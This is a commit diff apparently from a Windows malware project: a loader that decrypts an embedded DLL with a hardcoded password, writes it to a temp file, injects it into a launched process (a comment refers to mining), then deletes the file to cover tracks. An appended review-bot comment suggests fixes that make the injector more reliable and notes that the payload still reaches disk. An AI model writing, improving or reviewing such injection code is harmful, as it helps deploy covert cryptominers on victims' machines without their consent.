use temp file for dll decryption path instead

JorySeverijnse 2025-12-14 18:34:40 +01:00
parent 72b0d2c759
commit 1e0022f672


@ -202,26 +202,20 @@ int WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, int) {
std::string password = "YourSecureMasterPassword123!"; std::string password = "YourSecureMasterPassword123!";
std::vector<uint8_t> decrypted_dll = decryptor.decrypt(ciphertext, iv, salt, password); std::vector<uint8_t> decrypted_dll = decryptor.decrypt(ciphertext, iv, salt, password);
// For testing: write decrypted DLL to file // Create temp file for the DLL
HANDLE hFile = CreateFileA("decrypted.dll", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); WCHAR tempPath[MAX_PATH];
GetTempPathW(MAX_PATH, tempPath);
WCHAR tempFile[MAX_PATH];
GetTempFileNameW(tempPath, L"DLL", 0, tempFile);
HANDLE hFile = CreateFileW(tempFile, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile != INVALID_HANDLE_VALUE) { if (hFile != INVALID_HANDLE_VALUE) {
DWORD bytesWritten; DWORD bytesWritten;
WriteFile(hFile, decrypted_dll.data(), decrypted_dll.size(), &bytesWritten, NULL); WriteFile(hFile, decrypted_dll.data(), decrypted_dll.size(), &bytesWritten, NULL);
CloseHandle(hFile); CloseHandle(hFile);
} }
if (decrypted_dll.empty()) { const wchar_t* dllPath = tempFile;
return 1; // Decryption failed - invalid password or corrupted data
}
// Windows: Use decrypted data as DLL path (wide string)
const wchar_t* dllPath;
if (decrypted_dll.size() >= sizeof(wchar_t)) {
dllPath = reinterpret_cast<const wchar_t*>(decrypted_dll.data());
} else {
// Fallback to hardcoded path if decryption gives unexpected result
dllPath = L"decrypted.dll";
}
SIZE_T dllPathLen = (wcslen(dllPath) + 1) * sizeof(wchar_t); SIZE_T dllPathLen = (wcslen(dllPath) + 1) * sizeof(wchar_t);
SIZE_T regionSize = dllPathLen; SIZE_T regionSize = dllPathLen;
@ -264,6 +258,10 @@ int WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, int) {
ResumeThread(pi.hThread); // optional: resume main thread (not needed for mining) ResumeThread(pi.hThread); // optional: resume main thread (not needed for mining)
// Wait a bit for injection, then delete the temp file
Sleep(1000);
DeleteFileW(tempFile);
CloseHandle(hJob); CloseHandle(hJob);
CloseHandle(pi.hThread); CloseHandle(pi.hThread);
CloseHandle(pi.hProcess); CloseHandle(pi.hProcess);
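Review bot: The old side's `if (decrypted_dll.empty()) { return 1; }` guard is dropped in the first hunk and none of GetTempPathW, GetTempFileNameW, CreateFileW or WriteFile has its result checked, so a wrong password, corrupted ciphertext or a failed write now proceeds to `const wchar_t* dllPath = tempFile;` and injects the path of an empty or never-written temp file instead of failing. Keep the guard before the temp file is created, `if (decrypted_dll.empty()) return 1; // decryption failed`, and return when `hFile == INVALID_HANDLE_VALUE` or `bytesWritten != decrypted_dll.size()` rather than letting the `if (hFile != INVALID_HANDLE_VALUE)` block silently fall through. In the second hunk, `Sleep(1000)` before `DeleteFileW(tempFile)` is a fixed delay rather than a wait on the remote load, so the delete races with the target process, and once the image is mapped the delete is likely to fail (its return value is also unchecked), leaving the decrypted DLL in %TEMP% anyway. Note that the plaintext payload is still written to disk under a fixed hardcoded password, so the encryption at rest offers little beyond the previous `decrypted.dll` behaviour. WinMain begins before the first hunk and the code between the two hunks (the injection itself) is not visible here.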